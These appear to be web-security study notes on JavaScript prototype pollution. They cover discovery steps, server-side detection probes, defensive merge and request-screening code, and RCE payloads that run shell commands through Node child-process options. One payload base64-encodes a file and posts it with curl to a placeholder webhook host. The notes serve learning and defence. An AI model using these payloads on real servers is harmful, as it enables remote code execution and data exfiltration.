Prototype Pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects. Three ways to reach an object's prototype: name.__proto__, name['__proto__'], name.constructor.prototype

Steps:

  • Try different ways of adding an arbitrary property to Object.prototype: inject it via the query string, the URL fragment and any JSON input (e.g. __proto__[foo]=bar, then check Object.prototype.foo in the browser console).

  • Identify a gadget: a property the application reads from the prototype chain in a way that lets you execute arbitrary JavaScript.

Tools: DOM Invader (client-side) and the Server-Side Prototype Pollution Scanner Burp extension (server-side).

Server-side prototype pollution is harder to detect:

  • No source code access

  • Lack of developer tools

  • The DoS problem

  • Pollution persistence

POST or PUT requests that submit JSON data to an application or API are prime candidates for injecting the payload.

POST request (via __proto__):
{
    "user":"wiener",
    "__proto__":{
        "foo":"bar"
    }
}
POST request (via constructor.prototype):
{
    "user":"wiener",
    "constructor":{
        "prototype":{
            "foo":"bar"
        }
    }
}
Response (foo reflected, so the pollution worked):
{
    "username":"wiener",
    "foo":"bar"
}
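
The recursive merge behind most of these findings, as an added example that is not part of these notes: a vulnerable merge of the kind that handles both the query-string parameters from the steps above and the JSON bodies just shown, next to a hardened version. The two payload strings are the POST bodies above, constructed here inline; the function names are this example's own.

```javascript
// Added example (not from the original notes): a recursive merge of the kind
// behind many prototype pollution findings, next to a hardened version.
// The payloads are the two POST bodies shown above (constructed here as strings).

const PAYLOAD_PROTO = '{"user":"wiener","__proto__":{"foo":"bar"}}';
const PAYLOAD_CTOR  = '{"user":"wiener","constructor":{"prototype":{"foo":"bar"}}}';

function isObjectLike(v) {
  return v !== null && (typeof v === "object" || typeof v === "function");
}

function isPlainObject(v) {
  return v !== null && typeof v === "object" && !Array.isArray(v);
}

// VULNERABLE: walks every key of `source` and recurses whenever both sides
// look like objects. target["__proto__"] resolves through the __proto__
// accessor to Object.prototype, and target["constructor"]["prototype"] gets
// there too, so the recursion writes "foo" onto the global prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isObjectLike(value) && isObjectLike(target[key])) {
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// HARDENED: refuses the three key names that reach the prototype chain and
// only recurses into the target's own properties, never inherited ones.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Merges a payload into a fresh object with the given implementation and
// reports whether an unrelated object inherited "foo" afterwards. The
// prototype is restored before returning, because the pollution would
// otherwise persist for the life of the process (the "pollution
// persistence" point in the list above).
function probe(mergeFn, payloadJson) {
  mergeFn({}, JSON.parse(payloadJson));
  const leaked = ({}).foo;          // unrelated object, inherits from Object.prototype
  delete Object.prototype.foo;      // cleanup
  return { polluted: leaked !== undefined, value: leaked };
}

console.log("unsafeMerge / __proto__   :", probe(unsafeMerge, PAYLOAD_PROTO));
console.log("unsafeMerge / constructor :", probe(unsafeMerge, PAYLOAD_CTOR));
console.log("safeMerge   / __proto__   :", probe(safeMerge, PAYLOAD_PROTO));
console.log("safeMerge   / constructor :", probe(safeMerge, PAYLOAD_CTOR));
```

Blocking the key names is the usual library fix, but it only covers merges you control. Defence in depth on the server side: keep untrusted-keyed data in a Map or an object created with Object.create(null), validate bodies against a schema before merging, and consider Object.freeze(Object.prototype) or starting Node with --disable-proto=delete so that the __proto__ accessor is not available at all.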

Detection

"__proto__": {
    "json spaces": 10
}
// check the raw response: if the pollution worked, the JSON in the response is now indented with 10 spaces (Express's "json spaces" setting).
"__proto__": {
    "status": 412
}
// then trigger an error response with a JSON body: if the pollution worked, its status code is now 412, a status the application would not normally return.
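
Seen from the defending side, as an added example that is not part of these notes: the key names used in the probes above are also what a request screen should look for. The block below walks parsed JSON bodies and query-string parameter names for __proto__, constructor and prototype and raises one alert per offending request. The request records, field names and function names are this example's own constructions.

```javascript
// Added example (not from the original notes): screening requests for the key
// names that reach the prototype chain, so attempts are logged and rejected
// before any merge sees them. The request records below are constructed.

const POLLUTION_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walks a parsed JSON body and returns the dotted paths of suspicious keys.
// JSON.parse creates "__proto__" as an own property, so Object.keys sees it.
function findPollutionKeys(value, path = [], found = []) {
  if (value === null || typeof value !== "object") return found;
  for (const key of Object.keys(value)) {
    const here = [...path, key];
    if (POLLUTION_KEYS.has(key)) {
      found.push(here.join("."));   // report and stop; the subtree is the payload
      continue;
    }
    findPollutionKeys(value[key], here, found);
  }
  return found;
}

// Checks query-string parameter names such as __proto__[foo], __proto__.foo
// or constructor[prototype][foo]; URLSearchParams decodes percent-encoded
// brackets and underscores before the name is split into segments.
function findPollutionParams(queryString) {
  const hits = [];
  for (const [name] of new URLSearchParams(queryString)) {
    const segments = name.split(/[\[\].]+/).filter(Boolean);
    if (segments.some((s) => POLLUTION_KEYS.has(s))) hits.push(name);
  }
  return hits;
}

// Constructed request records: the first three carry the payload shapes
// from the notes above, the rest are benign or not JSON at all.
const SAMPLE_REQUESTS = [
  { method: "POST", path: "/api/user", query: "", body: '{"user":"wiener","__proto__":{"foo":"bar"}}' },
  { method: "POST", path: "/api/user", query: "", body: '{"user":"wiener","constructor":{"prototype":{"foo":"bar"}}}' },
  { method: "GET",  path: "/",         query: "__proto__[foo]=bar", body: "" },
  { method: "GET",  path: "/search",   query: "q=constructor&page=2", body: "" },
  { method: "POST", path: "/api/user", query: "", body: '{"user":"carlos","address":{"line1":"1 Main St"}}' },
  { method: "POST", path: "/api/user", query: "", body: "not json {" },
];

// Returns one alert per request that carries a pollution vector in its
// query string or JSON body. Bodies that are not JSON cannot reach a JSON
// merge, so they are skipped rather than treated as errors.
function scanRequests(requests) {
  const alerts = [];
  requests.forEach((req, index) => {
    const findings = findPollutionParams(req.query).map((n) => "query:" + n);
    if (req.body) {
      let parsed;
      try { parsed = JSON.parse(req.body); } catch { parsed = undefined; }
      if (parsed !== undefined) {
        findings.push(...findPollutionKeys(parsed).map((p) => "body:" + p));
      }
    }
    if (findings.length > 0) {
      alerts.push({ index, method: req.method, path: req.path, findings });
    }
  });
  return alerts;
}

for (const alert of scanRequests(SAMPLE_REQUESTS)) {
  console.log(`request #${alert.index} ${alert.method} ${alert.path}: ${alert.findings.join(", ")}`);
}
```

The value "constructor" in the fourth record is deliberately not flagged: only parameter and object key names can reach the prototype chain, so matching on values would only produce noise. Whether an alert leads to a 400 or just a log entry is a policy choice; either way the screen sits in front of the body parser and merge code, not behind it.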

RCE

For identifying:

"__proto__": {
    "shell":"node",
    "NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}

For exploitation:

"__proto__":{
    "execArgv": [
        "--eval=require('child_process').execSync('curl webhook')"
    ]
}
// find functionality that may spawn node child processes.

or:

"__proto__":{
    "shell":"vim",
    "input":":! <command>\n"
    // e.g. ":! cat /file | base64 | curl -d @- https://webhook\n"
}
// find functionality that may spawn node child processes.
